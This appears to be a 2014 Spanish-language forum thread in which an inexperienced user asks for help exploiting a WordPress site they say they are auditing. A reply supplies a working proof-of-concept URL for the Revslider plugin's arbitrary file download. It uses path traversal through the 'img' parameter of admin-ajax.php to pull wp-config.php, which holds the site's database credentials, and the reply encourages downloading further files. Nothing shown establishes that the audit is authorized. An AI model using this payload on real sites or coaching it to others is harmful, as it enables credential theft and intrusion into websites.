Título: ayuda con este exploit Publicado por: spinetta en 6 Noviembre 2014, 08:02 am Hola, estoy auditando una pagina web que utiliza word press 4.0, buscando en la famosa base de datos de exploit me encontre con este, http://www.exploit-db.com/exploits/34511/
me llamo la atencion porque encontre una pagina que estaba prohibida en robotos.txt osea que esta pagina no quiere que los buscadores la encuentren, la pagina es wp-admin/admin-ajax.php y en este exploit se hace mencion a ella. otra cosa que me serviria , es que si no concen este exploit me digan otro que conozcan. Porque no tengo experiencia en el tema, Gracias ! Título: Re: ayuda con este exploit Publicado por: ameise_1987 en 7 Noviembre 2014, 02:00 am Estimado,
bajo los dorks se encuentra el poc del exploit, http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ésto nos dice que el parámetro vulnerable es img y desde ahí debes llamar los archivos para descargar, intentaste descargar algún archivo ?? . saludos!. |